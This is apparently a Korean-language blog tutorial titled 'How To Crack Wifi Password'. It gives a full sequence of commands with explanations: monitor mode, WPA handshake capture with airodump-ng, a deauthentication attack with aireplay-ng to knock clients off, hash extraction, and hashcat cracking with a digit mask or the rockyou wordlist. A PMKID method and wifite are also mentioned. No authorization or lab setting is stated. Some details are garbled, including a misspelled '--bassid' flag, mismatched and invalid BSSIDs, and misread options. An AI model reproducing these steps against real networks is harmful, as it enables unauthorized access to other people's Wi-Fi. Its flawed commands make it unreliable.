Security

Wifi Crack

How To Crack Wifi Password

How To Crack Wifi Password

1. 무선 인터페이스의 기능과 설정을 표시

Copy
iw list

2. wlan0 인터페이스를 비활성화

Copy
ip link set wlan0 down

3. 무선 네트워크에서 발생하는 모든 패킷, 즉 데이터 프레임과 제어 프레임을 모두 수집할 수 있도록 무선 인터페이스를 설정

Copy
iw wlan0 set monitor control

4. wlan0 인터페이스를 활성화

Copy
ip link set wlan0 up

5. NetworkManager 서비스를 중지(wifi 네트워크를 캡쳐하는데 방해가 없도록)

Copy
systemctl stop NetworkManager

6. 무선 인터페이스를 사용하는 모든 프로세스를 종료하고, 무선 인터페이스를 중지시키는 명령어입니다. 이 명령어를 실행하면 무선 인터페이스를 모니터링할 수 있게 됩니다.

Copy
airmon-ng check kill 

7. 해당 무선 인터페이스에서 캡처한 무선 네트워크 정보를 출력합니다. 이 정보에는 무선 네트워크의 SSID, BSSID, 채널, 보안 설정 등이 포함됩니다.

Copy
airodump-ng wlan0

8.

Copy
airodump-ng wlan0 -w wpa-capture --bassid GA:A3:88:3E:69:2D -c 1
  • wlan0: 모니터 모드로 동작하는 무선 네트워크 인터페이스 이름을 지정합니다.
  • -w wpa-capture: 캡처한 패킷을 저장할 파일 이름을 지정합니다. 여기서는 wpa-capture라는 파일 이름으로 저장됩니다.
  • —bssid GA:A3:88:3E:69:2D: 타겟 AP의 BSSID를 지정합니다.
  • -c 1: 타겟 AP가 동작하는 채널을 지정합니다.

따라서, 이 명령어는 wlan0 인터페이스를 사용하여 GA:A3:88:3E:69:2D BSSID를 가진 무선 네트워크의 패킷을 wpa-capture 파일에 저장하고, 해당 무선 네트워크가 사용하는 1번 채널에서 캡처합니다.

9.

Copy
editcap -F pcap wpa-capture-05.cap wpa-capture.pcap

editcap은 캡처 파일의 일부분을 추출하거나, 다양한 형식으로 변환하는 등의 작업을 수행할 수 있는 유틸리티입니다. -F 옵션은 출력할 캡처 파일의 형식을 지정하는 옵션입니다. pcap은 원하는 출력 형식으로 cap 파일을 변환하겠다는 의미입니다. wpa-capture-05.cap은 변환할 대상 캡처 파일의 이름이며, wpa-capture.pcap은 출력 파일의 이름입니다.

10. hcxtools 설치

Copy
apt update, apt install hcxtools

11.

Copy
hcxpcapngtool -o hash.hc22000 wpa-capture.pcap 

해당 명령어는 hcxpcapngtool 프로그램을 사용하여 WPA/WPA2 핸드셰이크 패킷에서 PSK(Pre-Shared Key)를 추출하여 해시 값으로 저장하는 명령어입니다. 여기서 사용된 옵션은 다음과 같습니다.

  • -o hash.hc22000: 추출한 PSK 값을 해시 값으로 저장할 파일 이름을 지정합니다. 여기서는 hash.hc22000 파일에 저장됩니다.
  • wpa-capture.pcap: 핸드셰이크 패킷이 저장된 파일 이름을 지정합니다.

아래 12 나 13으로 크랙

12.

Copy
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d --show

해당 명령어는 Hashcat 프로그램을 사용하여 해시 값을 뚫는 데 사용되는 명령어입니다.

여기서 사용된 옵션은 다음과 같습니다.

  • -m 22000: 뚫을 해시의 종류를 지정합니다. 여기서는 WPA/WPA2에 사용되는 해시 형식인 22000을 지정합니다.

hash.hc22000: 뚫을 해시 값을 포함하고 있는 파일 이름을 지정합니다.

  • -a 3: 공격 모드를 지정합니다. 여기서는 브루트 포스 공격을 의미하는 3을 지정합니다.
  • ?d?d?d?d?d?d?d?d: 브루트 포스 공격에서 사용할 문자 집합을 지정합니다. 여기서는 0부터 9까지의 숫자를 의미하는 ?d를 8번 반복하여 사용합니다.
  • —show: 해독된 값을 출력합니다.

13.

Copy
hashcat -m 22000 hash.hc22000 rockyou.txt -r /usr/share/hashcat/rules/best64.rule

hashcat은 해시 크래킹을 위한 명령줄 도구 중 하나입니다.

  • -m 옵션은 해시 유형을 지정합니다. 22000은 WPA/WPA2 해시 유형을 나타냅니다.

  • hash.hc22000는 크래킹할 해시가 저장된 파일의 이름입니다. 이 파일에는 WPA/WPA2 네트워크에서 사용되는 패스워드의 해시 값이 포함되어 있습니다.

  • rockyou.txt는 크래킹에 사용할 패스워드 목록 파일입니다. 이 파일은 일반적인 패스워드로 사용되는 목록 중 하나입니다.

  • -r 옵션은 사용할 규칙 파일을 지정합니다. /usr/share/hashcat/rules/best64.rule은 기본 규칙 파일 중 하나인 best64.rule이 저장된 경로를 나타냅니다. 이 규칙 파일은 일반적인 패스워드 패턴을 사용하여 크래킹 속도를 높입니다.

위 명령어를 실행하면, hashcat은 rockyou.txt 파일의 패스워드 목록을 사용하여 hash.hc22000 파일에 저장된 WPA/WPA2 패스워드 해시 값을 크래킹합니다. 규칙 파일을 함께 사용하면 패스워드 크래킹 속도가 더욱 빨라집니다.

아래는 인증 해제 공격 이다. 핸드 쉐이크는 기기가 와이파이에 연결 될때 이루어 진다. 그때까지 기다릴수 없어서 와이파이 연결을 끊는 공격을 한다.

14.

Copy
aireplay-ng -0 1 -a 6A:A3:88:3E:69:2D wlan0

해당 명령어는 aireplay-ng 프로그램을 사용하여 무선 네트워크에서 Deauthentication 패킷을 전송하는 명령어입니다.

여기서 사용된 옵션은 다음과 같습니다.

  • -0 1: 전송할 디스어시에이션 패킷의 수를 지정합니다. 여기서는 1개의 패킷을 전송하도록 지정합니다.
  • -a 6A:A3:88:3E:69:2D: 디스어시에이션 패킷을 전송할 대상 AP의 BSSID(MAC 주소)를 지정합니다.
  • wlan0: 무선 네트워크 인터페이스 이름을 지정합니다.

따라서, 이 명령어는 wlan0 인터페이스를 사용하여 6A:A3:88:3E:69:2D BSSID를 가진 AP에 대해 1개의 Deauthentication 패킷을 전송합니다. 이를 통해 AP와 연결된 클라이언트를 끊어내어 네트워크에 대한 악의적인 접근을 시도할 수 있습니다.

명령을 실행하기 전에 아래 명령을 실행하자.

Copy
airodump-ng wlan0 -w wpa-capture --bassid GA:A3:88:3E:69:2D -c 1

15. 두번째 방법으로 다음 명령어를 실행.

Copy
hcxdumptool -o rsn-attack.pcapng -i wlan0 --enable_status=1,2,4,8

해당 명령어는 hcxdumptool 프로그램을 사용하여 무선 네트워크에서 발생하는 패킷을 캡처하는 명령어입니다.

여기서 사용된 옵션은 다음과 같습니다.

  • -o -attack.pcapng: 캡처한 패킷을 저장할 파일 이름을 지정합니다. 여기서는 attack.pcapng라는 파일 이름으로 저장됩니다. -o 옵션은 출력 파일을 지정하는 데 사용되며, -를 사용하면 출력을 stdout으로 전달합니다.
  • -I wlan0: 모니터 모드로 동작하는 무선 네트워크 인터페이스 이름을 지정합니다.
  • —enable_status=1,2,4,8: 패킷 헤더에 포함될 추가 정보를 지정합니다. 여기서는 AP의 신호 강도, 클라이언트 신호 강도, 클라이언트가 보낸 패킷 수, 클라이언트가 받은 패킷 수 정보를 포함하도록 지정합니다. 각 정보에 해당하는 값인 1, 2, 4, 8을 ,로 구분하여 지정합니다.

이 방법은 위에 핸드 쉐이크 과정을 캡쳐하는 것과 다르게 버그를 이용해서 PMKIDROGUE 를 캡쳐하는 방식인데 테스트 해보니 캡쳐가 안됨. 더 많은 테스트가 필요함

16. 세번째 방법으로 wifite

위에 방법들을 자동화한 tool